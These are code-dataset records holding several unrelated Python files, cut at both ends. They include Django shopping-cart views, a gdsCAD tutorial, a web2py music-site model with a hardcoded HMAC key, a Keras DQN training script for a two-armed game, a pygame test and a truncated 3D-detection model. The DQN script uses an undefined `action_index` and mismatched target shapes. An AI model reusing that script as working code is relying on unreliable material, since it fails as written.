app.connect('127.0.0.1', port=7497, clientId=123)\n app.run()","sub_path":"Examples/9_commReportsRequest.py","file_name":"9_commReportsRequest.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"391763186","text":"from django.shortcuts import render\nfrom django.views.decorators.http import require_POST\nfrom .forms import CartAddProductForm\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom shop.models import Product\nfrom .cart import Cart\nfrom coupons.forms import CouponApplyForm\n\n\n# Create your views here.\n@require_POST\ndef cart_add(request, product_id):\n cart = Cart(request)\n product = get_object_or_404(Product, id=product_id)\n form = CartAddProductForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n cart.add(product=product,\n quantity=cd['quantity'],\n update_quantity=cd['update'])\n return redirect('cart:cart_detail')\n\ndef cart_remove(request, product_id):\n cart = Cart(request)\n product = get_object_or_404(Product, id=product_id)\n cart.remove(product)\n return redirect('cart:cart_detail')\n\ndef cart_modificate(request):\n cart = Cart(request)\n if request.method == 'POST':\n product_id = request.POST['id']\n button = request.POST['button']\n product = get_object_or_404(Product, id=product_id)\n if button == '+':\n increment = button\n decrement = None\n else:\n increment = None\n decrement = button\n cart.modificate(product, increment, decrement)\n return redirect('cart:cart_detail') \n\ndef cart_detail(request):\n cart = Cart(request)\n for item in cart:\n item['update_quantity_form'] = CartAddProductForm(\n initial={'quantity': item['quantity'],\n 'update': True})\n coupon_apply_form = CouponApplyForm()\n return render(request,\n 'cart/detail.html',\n {'cart': cart,\n 'coupon_apply_form': coupon_apply_form})\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product,\n id=id,\n slug=slug,\n available=True)\n cart_product_form = CartAddProductForm()\n return render(request, 'product.html', {'product': product,\n 'cart_product_form': cart_product_form})","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512612401","text":"import os.path\nfrom gdsCAD import *\n\n# Create some things to draw:\namarks = templates.AlignmentMarks(('A', 'C'), (1,2))\ntext = shapes.Label('Hello\\nworld!', 200, (0, 0))\nbox = shapes.Box((-500, -400), (1500, 400), 10, layer=2)\n\n# Create a Cell to hold the objects\ncell = core.Cell('EXAMPLE')\ncell.add([text, box])\ncell.add(amarks, origin=(-200, 0))\ncell.add(amarks, origin=(1200, 0))\n\n# Create two copies of the Cell\ntop = core.Cell('TOP')\ncell_array = core.CellArray(cell, 1, 2, (0, 850))\ntop.add(cell_array)\n\n# Add the copied cell to a Layout and save\nlayout = core.Layout('LIBRARY')\nlayout.add(top)\nlayout.save('output.gds')\n\nlayout.show()\n","sub_path":"tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359221626","text":"# -*- coding: utf-8 -*- \n\n#########################################################################\n## This scaffolding model makes your app work on Google App Engine too\n#########################################################################\n\nif request.env.web2py_runtime_gae: # if running on Google App Engine\n db = DAL('gae') # connect to Google BigTable\n session.connect(request, response, db=db) # and store sessions and tickets there\n ### or use the following lines to store sessions in Memcache\n # from gluon.contrib.memdb import MEMDB\n # from google.appengine.api.memcache import Client\n # session.connect(request, response, db=MEMDB(Client())\nelse: # else use a normal relational database\n db = DAL('sqlite://storage2.sqlite') # if not, use SQLite or other DB\n## if no need for session\n# session.forget()\n\n#########################################################################\n## Here is sample code if you need for \n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - crud actions\n## comment/uncomment as needed\n\nfrom gluon.tools import *\nauth=Auth(globals(),db) # authentication/authorization\nauth.settings.hmac_key='sha512:871633f0-1186-44d3-9f20-6797d2e5dd3f'\nauth.define_tables() # creates all needed tables\ncrud=Crud(globals(),db) # for CRUD helpers using auth\nservice=Service(globals()) # for json, xml, jsonrpc, xmlrpc, amfrpc\n\n# crud.settings.auth=auth # enforces authorization on crud\n# mail=Mail() # mailer\n# mail.settings.server='smtp.gmail.com:587' # your SMTP server\n# mail.settings.sender='you@gmail.com' # your email\n# mail.settings.login='username:password' # your credentials or None\n# auth.settings.mailer=mail # for user email verification\n# auth.settings.registration_requires_verification = True\n# auth.settings.registration_requires_approval = True\n# auth.messages.verify_email = 'Click on the link http://'+request.env.http_host+URL(r=request,c='default',f='user',args=['verify_email'])+'/%(key)s to verify your email'\n# auth.settings.reset_password_requires_verification = True\n# auth.messages.reset_password = 'Click on the link http://'+request.env.http_host+URL(r=request,c='default',f='user',args=['reset_password'])+'/%(key)s to reset your password'\n## more options discussed in gluon/tools.py\n#########################################################################\n\n######################################i###################################\n## Define your tables below, for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\nimport datetime\n#User Table is used to store complete information about the user.\ndb.define_table('user',\t\t\t\n\t\tField('first_name','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your First Name\"))),\n\t\tField('last_name','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Last Name\"))),\n\t\tField('Occupation','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Occupation!!\"))),\n\t\tField('city','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your City!!\"))),\n\t\tField('country','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Country!!\"))),\n\t\tField('dob','date',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Date Of Birth!!\"))),\n\t\tField('gender','string',requires=IS_IN_SET(['Male','Female']),default='Male',widget=SQLFORM.widgets.radio.widget),\n\t\tField('email_id','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Enter your E-mail id!!\"))),\n\t\tField('password','password',requires=IS_NOT_EMPTY(error_message=T(\"Please choose a Password!!\"))),\n\t\tField('retype_password','password',requires=IS_NOT_EMPTY(error_message=T(\"Please Retype your Password!!\"))),\n\t\tField('download_slots','integer'),# No. of download slots available to user.\n\t\tField('rates','integer'),\n\t\tField('slots_used','integer'),\n\t\tField('visits','integer'),\n\t\tField('type','double'))\t\t#type 1=moderator,2=general user\n# Music Table is used to store details of a song.\ndb.define_table('music',\n\t\tField('userid',db.user),\n\t\tField('movie','string'),\n\t\tField('title','string',requires=IS_NOT_EMPTY()),\n\t\tField('artist','string'),\n\t\tField('type','integer'), # type 1=music approved,type2=music not approved\n\t\tField('yor','integer'),\n\t\tField('image','upload',autodelete=True,requires=IS_IMAGE()),\n\t\tField('rating','integer',requires=IS_IN_SET([1,2,3,4,5])),\n\t\tField('filename','string'),\n\t\tField('song','upload',autodelete=True,requires=IS_NOT_EMPTY(error_message=T('Please upload the song !!'))))\n# keyword table is used to store keywords for a particular song.\ndb.define_table('keyword',\n\t\tField('songid',db.music),\n\t\tField('keyword','string',requires=IS_NOT_EMPTY()))\n# song rating table is used to store ratings for music.\ndb.define_table('song_rating',\n\t\tField('songid',db.music),\n\t\tField('rating_sum','integer'),\n\t\tField('users_rated','integer'),\n\t\tField('avg_rating','double'))\n#user rating is used to store ratings given to a song by a particular user.\ndb.define_table('user_rating',\n\t\tField('userid',db.user),\n\t\tField('songid',db.music),\n\t\tField('rating','integer',requires=IS_IN_SET([1,2,3,4,5]),comment='Out of 5'))\n#playlist is used to store playlists of a particluar user\ndb.define_table('playlist',\n\t\tField('userid',db.user),\n\t\tField('name','string',requires=IS_NOT_EMPTY(error_message=T('Please Enter a Name !!'))))\n# playlist_song is used to store songs in a particular playlist.\ndb.define_table('playlist_song',\n\t\tField('playlistid',db.playlist),\n\t\tField('songid',db.music))\ndb.define_table('usrhistory',\n\t\tField('userid',db.user),\n\t\tField('login_time','datetime'),\n\t\tField('logout_time','datetime'),\n\t\tField('visitorno','integer'))\ndb.define_table('comments',\n\t\tField('userid',db.user),\n\t\tField('songid',db.music),\n\t\tField('posted_on','datetime'),\n\t\tField('comment','text'))\n#db.user.retype_password.requires=IS_NOT_EMPTY(error_message=T('Please Retype Password!!'))\n#db.playlist_song.playlistid.requires=IS_IN_DB(db(db.playlist.userid==session.id),'playlist.id','%(name)s')\ndb.playlist_song.songid.requires=IS_IN_DB(db(db.music.type==1),'music.id','%(title)s')\ndb.user.email_id.requires=IS_NOT_IN_DB(db,'user.email_id'),IS_EMAIL(error_message=T(\"Enter Corect E-mail ID\"))\ndb.user.dob.requires=IS_DATE(error_message=T(\"Enter Date as yyyy-mm-dd\"))\ndb.song_rating.requires=IS_NOT_EMPTY()\ndb.playlist.name.requires=IS_NOT_IN_DB(db(db.playlist.userid==session.id),'playlist.name')\n","sub_path":"Library/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357591024","text":"# From 22/3/2017, I migrated the code to using conventions of tensorflow 1.0 and Keras 2.0\n\n# This model is 2 arms controlled by 1 NN. The NN has 9 possible controls\n\nfrom __future__ import print_function\n\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport skimage as skimage\nimport time\nfrom collections import deque\nfrom keras.initializers import RandomNormal\nfrom keras.layers import Input, Dense\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.models import Model\nfrom keras.models import save_model\nfrom keras.optimizers import SGD, Adam\nfrom skimage import transform, color, exposure\n\nfrom shimon_hero import shimon_hero as sh\n\nSAVE_MODEL = True # If just troubleshooting, then turn SAVE_MODEL off to avoid cluttering the workspace with logs and models\nDEBUG = False # Set to true for verbose printing\n\nNUM_ACTIONS = 3 # number of valid actions\nGAMMA = 0.99 # decay rate of past observations\nOBSERVATION = 3200. # timesteps to observe before training\nEXPLORE = 3000000. # frames over which to anneal epsilon\nFINAL_EPSILON = 0.0001 # final value of epsilon\nINITIAL_EPSILON = 0.1 # starting value of epsilon\nREPLAY_MEMORY = 50000 # number of previous transitions to remember\nBATCH = 32 # size of minibatch\nFRAME_PER_ACTION = 3 # This controls how many frames to wait before deciding on an action. If F_P_A = 1, then Shimon\n# chooses a new action every tick, which causes erratic movements with no exploration middle spaces\n\n# 1NN controlling 2 arms means you need to enumerate all the controls\naction_dict = {0: -1, 1: 0, 2: 1}\n\nimg_rows, img_cols = 80, 80 # All images are downsampled to 80 x 80\nimg_channels = 4 # Stack 4 frames to infer movement\n\n# Initialize instance of Shimon Hero game\ngame = sh.Game() # Instantiate Shimon Hero game\ntimestr = time.strftime(\"%m-%d_%H-%M-%S\") # save the current time to name the model\nmodel_prefix = \"2A1NN_\" + timestr # The prefix used to identify the model and time training was created\n\n# Save the shimon_hero paramters corresponding to the model\nshimon_hero_param = game.get_settings()\nif SAVE_MODEL:\n param_path = \"../saved_models/\" + model_prefix + \"_param.p\"\n with open(param_path, 'wb') as f:\n pickle.dump(shimon_hero_param, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef buildmodel():\n # To make a model with shared weights, need to use Keras Functional API, not Sequential API\n\n input_img = Input(shape=(img_rows, img_cols, img_channels))\n\n # 1st Convolutional layer\n layer1_out = Conv2D(input_shape=(img_rows, img_cols, img_channels),\n filters=32,\n kernel_size=(8, 8),\n strides=(4, 4),\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n padding='same',\n activation='relu')(input_img)\n\n # 2nd Convolutional layer\n layer2_out = Conv2D(filters=64,\n kernel_size=(4, 4),\n strides=(2, 2),\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n padding='same',\n activation='relu')(layer1_out)\n\n # 3rd Convolutional layer\n layer3_out = Conv2D(filters=64,\n kernel_size=(3, 3),\n strides=(1, 1),\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n padding='same',\n activation='relu')(layer2_out)\n\n # Flatten the CNN tensors into a long vector to feed into a Dense (Fully Connected Layer)\n # Up to this point, we have performed feature extraction on the game image. Now we need to split\n # it up to left and right arm instructions via FC layers\n CNN_out = Flatten()(layer3_out)\n\n # LEFT ARM\n L_FC1_out = Dense(512,\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n activation='relu')(CNN_out)\n\n L_output = Dense(NUM_ACTIONS,\n name='L_output',\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None))(L_FC1_out)\n\n # RIGHT ARM\n R_FC1_out = Dense(512,\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n activation='relu')(CNN_out)\n\n R_output = Dense(NUM_ACTIONS,\n name='R_output',\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None))(R_FC1_out)\n\n # Use the Adam optimizer for gradient descent\n adam = Adam(lr=1e-6)\n\n # Compile the model\n # model.compile(loss='mse', optimizer=adam)\n\n model = Model(inputs=input_img, outputs=[L_output, R_output])\n model.compile(optimizer=adam,\n loss='mse',\n loss_weights=[1.0, 1.0])\n\n # Print a summary of the model\n print(model.summary())\n return model\n\n\ndef trainNetwork(model):\n # DeepMind papers uses what is called a \"Replay Memory\". Replay Memory stores a collection of states (or frames).\n # When the network is trained, a random sample is taken from Replay Memory. This is to retain i.i.d condition\n # since subsequent frames have highly correlated movement. Use deque() object from python library.\n RM = deque()\n\n # Get the first frame by doing nothing, for two arms this is [0, 0]\n image_data, r_t, game_over, game_score = game.next_action([0, 0])\n\n # Preprocess image --> Change to greyscale and downscale to 80x80\n x_t = skimage.color.rgb2gray(image_data)\n x_t = skimage.transform.resize(x_t, (80, 80))\n x_t = skimage.exposure.rescale_intensity(x_t, out_range=(0, 255))\n # plt.matshow(x_t, cmap=plt.cm.gray)\n # plt.show()\n\n # To infer movement between frames, stack 4 frames together as one \"sample\" for training\n s_t = np.stack((x_t, x_t, x_t, x_t), axis=0)\n\n # To feed data into CNN, it must be in the correct tensor format\n # In tensorflow, it must be in the form (1,80,80,4)\n s_t = s_t.reshape(1, s_t.shape[1], s_t.shape[2], s_t.shape[0])\n\n # Variables for parameter annealing\n OBSERVE = OBSERVATION\n epsilon = INITIAL_EPSILON\n\n # Create a log to store the training variables at each time step\n model_log_dir = \"../saved_models/\" + model_prefix + \"_LOG.txt\"\n if SAVE_MODEL:\n if not os.path.exists(model_log_dir):\n with open(model_log_dir, \"w\") as text_file:\n text_file.write(\"Model Log \" + timestr + \"\\n\")\n\n t = 0\n L_action_index = 0\n R_action_index = 0\n max_score = 0\n while (True):\n # Declare a few variables for the Bellman Equation\n loss = 0\n Q_sa_t1 = 0\n\n # To prevent the model from falling into a local minimum or \"exploring only one side of the screen\",\n # DeepMind chooses a random action from time to time to encourage exploration of other states (a hack)\n if t % FRAME_PER_ACTION == 0: # This selects an action depending on FRAME_PER_ACTION (default = 1)\n # print(\"--- { NEW ACTION } ---\")\n\n q_predictions = model.predict(s_t) # for 2 arms this looks like [array([[ 0.0046034 , -0.00290494, -0.00516033]], dtype=float32), array([[ 0.00205019, -0.01548742, -0.00640914]], dtype=float32)]\n L_action_index = np.argmax(q_predictions[0].flatten()) # L_action_index = L_max_Q = np.argmax(q_predictions[0].flatten())\n R_action_index = np.argmax(q_predictions[1].flatten()) # R_action_index = R_max_Q = np.argmax(q_predictions[1].flatten())\n\n # As time progresses, reduce epsilon gradually. This concept is exactly like \"Simulated Annealing\".\n # Epsilon starts out high (default=0.1) and tends towards FINAL_EPSILON (default=0.0001). So the\n # system has begins with high energy and is likely to jump around to new states and gradually \"cools\"\n # to a optimal minimum.\n if epsilon > FINAL_EPSILON and t > OBSERVE:\n epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n\n # run the selected action and observed next state and r_t\n\n image_data, r_t, game_over, game_score = game.next_action(action_dict[action_index])\n\n # preprocess the image\n x_t1 = skimage.color.rgb2gray(image_data)\n x_t1 = skimage.transform.resize(x_t1, (80, 80))\n x_t1 = skimage.exposure.rescale_intensity(x_t1, out_range=(0, 255))\n\n x_t1 = x_t1.reshape(1, x_t1.shape[0], x_t1.shape[1], 1) # This is just one image frame (1,80,80,1)\n\n # From previous s_t stack, take the top 3 layers and stack these below x_t1\n s_t1 = np.append(x_t1, s_t[:, :, :, :3], axis=3)\n\n # Store this transition in RM (Replay Memory). The transition contains information on state, action_index, r_t, the next state, and wehther it is game over.\n RM.append((s_t, action_index, r_t, s_t1, game_over))\n if len(RM) > REPLAY_MEMORY:\n RM.popleft() # Get rid of the oldest item added to deque object\n\n # Up until this point, the code has just been the playing the game and storing the image stacks.\n # After a certain number of observations defined by OBSERVE (default = 3200), we have enough\n # data points in RM (Replay Memory) to begin drawing batches of training data\n if t > OBSERVE:\n # Sample a minibatch to train on\n mini_batch = random.sample(RM, BATCH) # From selection RM, choose BATCH=32 number of times\n\n # Neural Networks are universal function approximators. Given an input stack of 4 images, we want the network\n # to output the correct the Q(s,a) for each possible given a state (the state is the stack of 4 images.)\n # This is like the y=f(x) problem where network is trying to learn the best f so that x maps onto y.\n # The \"targets\" are the outputs, which correspond to the Q(s,a) value for each possible action a.\n inputs = np.zeros((BATCH, s_t.shape[1], s_t.shape[2], s_t.shape[3])) # This should (32,80,80,4)\n targets = np.zeros((BATCH, NUM_ACTIONS)) # This should be (32,4) and stores the r_t for each of the actions\n\n # Use random indices to select minibatch from Replay Memory\n for i in range(0, len(mini_batch)):\n state_t = mini_batch[i][0] # This is the state\n action_t = mini_batch[i][1] # This is the action index\n reward_t = mini_batch[i][2] # This is the r_t at state t\n state_t1 = mini_batch[i][3] # This is the next state t+1\n game_over_t = mini_batch[i][4] # This is the boolean of whether game is over\n\n # Populate input tensor with samples. Remember inputs begins as np.zeros(32,80,80,4). We are now\n # filling it in line by line as i is incremented over minibatch\n inputs[i:i + 1] = state_t\n\n # Use model to predict the output action given state_t. This is like the LHS of Bellman EQN\n targets[i] = model.predict(state_t)\n # Use model to predict the output action given state_t1. This is the Q(s',a') in the RHS of Bellman EQN\n Q_sa_t1 = model.predict(state_t1) # This is a 1x4 vector corresponding to probs of each possible action\n\n # if game_over_t=True, then state equals reward_t\n if game_over_t:\n targets[i, action_t] = reward_t\n # if game is still playing, then action receives a discounted reward_t\n else:\n targets[i, action_t] = reward_t + (GAMMA * np.max(Q_sa_t1))\n # What just happened? After the step above, the action_index in targets (32x4) has the highest r_t\n # We want the weight training process to bias towards the action_index with highest r_t obtained from Bellman EQN\n # I think the example uses a very hacky method.\n\n # Compute the cumulative loss\n loss += model.train_on_batch(inputs, targets)\n\n # Update variables for next pass\n s_t = s_t1\n t = t + 1\n\n # Keep track of the highest score and write to file if max_score changes\n if game_score > max_score:\n max_score = game_score\n logging_string = \"TIME %8d | MAX_SCORE %3d\" % (t, max_score)\n print(logging_string)\n if SAVE_MODEL:\n # If saving model, then only update the text file with information on the time step and the score\n with open(model_log_dir, 'a') as text_file:\n text_file.write(logging_string + \"\\n\")\n\n if DEBUG:\n # Track current annealed state\n if t <= OBSERVE:\n state = \"Observing\"\n elif t > OBSERVE and t <= OBSERVE + EXPLORE:\n state = \"Exploring\"\n else:\n state = \"Training\"\n debugging_string = \"TIME %8d | STATE %1s | EPS %3.10f | ACT %1d | REW %5.1f | Q_MAX_t1 %8.4f | LOSS %8.4f | GAME_O %s | MAX_SCORE %3d\" % (\n t, state, epsilon, action_index, r_t, np.max(Q_sa_t1), loss, str(game_over), max_score)\n print(debugging_string)\n\n if SAVE_MODEL and t % 10000 == 0:\n # Save progress every 10,000 iterations\n print(\"Saving model at timestep: \" + str(t))\n model_path = \"../saved_models/\" + model_prefix + \".h5\"\n save_model(model, model_path,\n overwrite=True) # saves weights, network topology and optimizer state (if any)\n\n if t % 5000 == 0:\n print(\"Timestep: \", t)\n\n game.exit_game()\n\n\ndef main():\n model = buildmodel()\n trainNetwork(model)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"UnitTests/sharedLayersUT1.py","file_name":"sharedLayersUT1.py","file_ext":"py","file_size_in_byte":13828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"117079934","text":"from Map import Map\nimport pygame, random, sys\n\npygame.init()\n\nscreen = pygame.display.set_mode([500,500])\n\nrunning = True\nwhile running:\n # Did the user click the window close button?\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n \n # Fill the background with white\n screen.fill((255, 255, 255))\n\n # Draw a solid blue circle in the center\n pygame.draw.circle(screen, (0, 0, 255), (250, 250), 75)\n\n # Flip the display\n pygame.display.flip()\n\n# Done! Time to quit.\npygame.quit()\n\nmap1 = Map(6, 6)\nprint(map1.getPath(5, 5, 4, 1))\nprint(map1.findPath(input(), False))\n","sub_path":"MapTest.py","file_name":"MapTest.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"569183922","text":"import math\nfrom mmdet3d.models.detectors.base import Base3DDetector\nimport torch\nfrom torch import nn as nn\n\nfrom mmdet3d.core import bbox3d2result, merge_aug_bboxes_3d\nfrom mmdet.models import DETECTORS, build_backbone, build_neck, build_head\n\n\n@DETECTORS.register_module()\nclass FVNet(Base3DDetector):\n\n def __init__(self,\n projection_cfg=None,\n fv_backbone=None,\n fv_neck=None,\n img_backbone=None,\n img_neck=None,\n bbox_head=None,\n fusion_mode=None,\n train_cfg=None,\n test_cfg=None,\n init_cfg=None,\n pretrained=None):\n super(FVNet, self).__init__(init_cfg)\n\n self.projection_cfg = projection_cfg\n if fv_backbone:\n self.fv_backbone = build_backbone(fv_backbone)\n if fv_neck:\n self.fv_neck = build_neck(fv_neck)\n if img_backbone:\n self.img_backbone = build_backbone(img_backbone)\n if img_neck:\n self.img_neck = build_neck(img_neck)\n if bbox_head:\n self.bbox_head = build_head(bbox_head)\n\n self.fusion_mode = fusion_mode\n self.train_cfg = train_cfg\n self.test_cfg = test_cfg\n # TODO: image backbone pretrained 구현\n\n @property\n def with_fv_backbone(self):\n \"\"\"bool: Whether the detector has a neck in image branch.\"\"\"\n return hasattr(self, 'fv_backbone') and self.fv_backbone is not None\n\n @property\n def with_fv_neck(self):\n \"\"\"bool: Whether the detector has a neck in image branch.\"\"\"\n return hasattr(self, 'fv_neck') and self.fv_neck is not None\n\n @property\n def with_img_backbone(self):\n \"\"\"bool: Whether the detector has a neck in image branch.\"\"\"\n return hasattr(self, 'img_backbone') and self.img_backbone is not None\n\n @property\n def with_img_neck(self):\n \"\"\"bool: Whether the detector has a neck in image branch.\"\"\"\n return hasattr(self, 'img_neck') and self.img_neck is not None\n\n def extract_img_feat(self, img, img_metas):\n \"\"\"Extract features of images.\"\"\"\n if self.with_img_backbone and img is not None:\n input_shape = img.shape[-2:]\n # update real input shape of each single img\n for img_meta in img_metas:\n img_meta.update(input_shape=input_shape)\n\n if img.dim() == 5 and img.size(0) == 1:\n img.squeeze_()\n elif img.dim() == 5 and img.size(0) > 1:\n B, N, C, H, W = img.size()\n img = img.view(B * N, C, H, W)\n img_feats = self.img_backbone(img)\n else:\n return None\n if self.with_img_neck:\n img_feats = self.img_neck(img_feats)\n return img_feats\n\n def extract_fv_feat(self, fv, img_metas):\n \"\"\"Extract features of points.\"\"\"\n if self.with_fv_backbone and fv is not None:\n x = self.fv_backbone(fv)\n else:\n return None\n if self.with_fv_neck:\n x = self.fv_neck(x)\n return x\n\n def extract_feat(self, fv, img, img_metas):\n fv_feats = self.extract_fv_feat(fv, img_metas)\n img_feats = self.extract_img_feat(img, img_metas)\n return (fv_feats, img_feats)\n\n def get_valid_coords(self, fv):\n valid_coords = dict()\n b, v, u = torch.nonzero(fv[:, -1, :, :], as_tuple=True)\n valid_coords_2d = torch.stack([b, v, u]).T\n valid_coords_3d = fv[b, :3, v, u]\n valid_coords_3d = torch.cat([b.unsqueeze(dim=-1), valid_coords_3d], dim=1)\n valid_coords['2d'] = valid_coords_2d\n valid_coords['3d'] = valid_coords_3d\n\n return valid_coords\n \n def pts_to_fv(self, points, img_metas):\n # TODO: Flip 어떻게 처리??\n device = points[0].device\n lidar2img = [torch.tensor(res['lidar2img'], device=device) for res\\\n in img_metas]\n lidar2img = torch.stack(lidar2img) # (B, 4, 4)\n num_points = [pts.shape[0] for pts in points]\n for i in range(len(points)):\n pts = points[i]\n if pts.shape[0] < max(num_points):\n res = max(num_points) - pts.shape[0]\n points[i] = torch.cat([pts, pts.new_zeros(res, pts.shape[1])], 0)\n points = torch.stack(points) # (B, max(N), 4)\n\n reflectances = points[..., -1]\n points = points[..., :3] # (B, max(N), 3)\n proj_velo2cam2 = lidar2img[:, :3, :]\n pts_2d = self.project_to_image(points.permute(0, 2, 1), proj_velo2cam2)\n\n fv_list = []\n for i in range(points.shape[0]):\n width, height = img_metas[i]['img_info']['img_shape']\n inds = torch.where((pts_2d[i, 0, :] < width) & (pts_2d[i, 0, :] >= 0) &\n (pts_2d[i, 1, :] < height) & (pts_2d[i, 1, :] >= 0))[0]\n imgfov_pc_pixel = pts_2d[i, :, inds]\n imgfov_pc_velo = points[i, inds, :]\n reflectance = reflectances[i, inds]\n\n fv = points[0].new_zeros(height, width, 5)\n x_coords = torch.trunc(imgfov_pc_pixel[0]).to(torch.long)\n y_coords = torch.trunc(imgfov_pc_pixel[1]).to(torch.long)\n fv[y_coords, x_coords, :3] = imgfov_pc_velo\n fv[y_coords, x_coords, 3] = reflectance\n flag_channel = (fv[:, :, 0] > 0)\n fv[:, :, -1] = flag_channel\n fv = fv.permute(2, 0, 1)\n fv_list.append(fv)\n\n return fv_list\n\n def project_to_image(self, points, proj_mat):\n # points (B, 3, max(N))\n # proj_mat (B, 3, 4)\n batch_size = points.shape[0]\n num_pts = points.shape[2]\n\n points = torch.cat([points, points.new_ones(batch_size, 1, num_pts)], 1)\n points = torch.bmm(proj_mat, points) # (B, 3, 4) @ (B, 4, max(N))\n # points (B, 3, max(N))\n points[:, :2, :] /= points[:, 2, :].reshape(points.shape[0], 1, points.shape[2])\n return points[:, :2, :] #(B, 2, max(N))\n\n def fusion(self, fv_feats, img_feats, fusion_mode):\n if fusion_mode is None:\n if fv_feats is not None:\n return fv_feats\n if img_feats is not None:\n return img_feats\n\n def resize_and_pad(self, fv_list, img_metas):\n # Resize\n new_fv_list = []\n for i in range(len(fv_list)):\n # Resize\n fv = fv_list[i]\n w_src, h_src = fv.shape[2], fv.shape[1]\n w_des, h_des = self.projection_cfg['size']\n w_scale, h_scale = (w_des / w_src, h_des / h_src)\n if not (w_scale == 1. and h_scale == 1.):\n fv_resized = torch.zeros((fv.shape[0], h_des, w_des),\n dtype=fv.dtype,\n device=fv.device)\n _, src_v, src_u = torch.nonzero(fv, as_tuple=True)\n src_idx = torch.stack([src_v, src_u]).unique(dim=1)\n des_v = (src_idx[0] * h_scale).to(torch.long)\n des_u = (src_idx[1] * w_scale).to(torch.long)\n fv_resized[:, des_v, des_u] = fv[:, src_idx[0, :], src_idx[1, :]]\n fv = fv_resized\n # Padding\n divisor = self.projection_cfg['divisor']\n h_src, w_src = fv.shape[1], fv.shape[2]\n h_des = math.ceil(fv.shape[1] / divisor) * divisor\n w_des = math.ceil(fv.shape[2] / divisor) * divisor\n h_pad = h_des - h_src\n w_pad = w_des - w_src\n if not (h_pad == 0 and w_pad == 0):\n fv_padded = torch.zeros((fv.shape[0], h_des, w_des),\n dtype=fv.dtype,\n device=fv.device)\n fv_padded[:, :h_src, :w_src] = fv\n fv = fv_padded\n new_fv_list.append(fv) \n fv = torch.stack(new_fv_list)\n return fv\n \n def filter_valid_feats(self, feats, valid_coords):\n # feats: list [(B, 64, h, w)]\n # valid_coords['2d']: torch.Tenosr (N, 3)\n # valid_coords['3d']: torch.Tensor (N, 4)\n # h*w 개의 픽셀 중 N개 필터링\n # TODO: multi scale 구현(get valid coords먼저)\n\n b = valid_coords['2d'][:, 0]\n v = valid_coords['2d'][:, 1]\n u = valid_coords['2d'][:, 2]\n valid_feats = feats[0][b, :, v, u] # list [(N, 64)]\n\n # concat xyz\n xyz = valid_coords['3d'][:, 1:]\n valid_feats = torch.cat([xyz, valid_feats], dim=1)\n\n return [valid_feats]\n\n def forward_train(self,\n points,\n img_metas,\n gt_bboxes_3d,\n gt_labels_3d,\n imgs=None,\n gt_bboxes_ignore=None):\n\n fv = self.pts_to_fv(points, img_metas) # list B x (5, h, w)\n fv = self.resize_and_pad(fv, img_metas) # (B, 5, h', w')\n\n # flip\n p = torch.rand(1)[0]\n if p > 0.5:\n fv = torch.flip(fv, dims=[3])\n fv[:, 1, :, :] *= -1\n for i in range(len(gt_bboxes_3d)):\n gt_bboxes_3d[i].tensor[:, 1] *= -1\n # # scale\n scale_factor = torch.rand(1).item() * 0.1 + 0.95\n fv[:, :3, :, :] *= scale_factor\n for i in range(len(gt_bboxes_3d)):\n gt_bboxes_3d[i].tensor[:, :6] *= scale_factor\n\n valid_coords = self.get_valid_coords(fv)\n fv_feats, img_feats = self.extract_feat(fv, imgs, img_metas)\n feats = self.fusion(fv_feats, img_feats, self.fusion_mode)\n pts_feats = self.filter_valid_feats(feats, valid_coords)\n outs = self.bbox_head(pts_feats)\n losses = self.bbox_head.loss(*outs,\n gt_bboxes_3d,\n gt_labels_3d,\n valid_coords)\n return losses\n \n def simple_test(self,\n points,\n img_metas,\n imgs=None,\n gt_bboxes_3d=None,\n 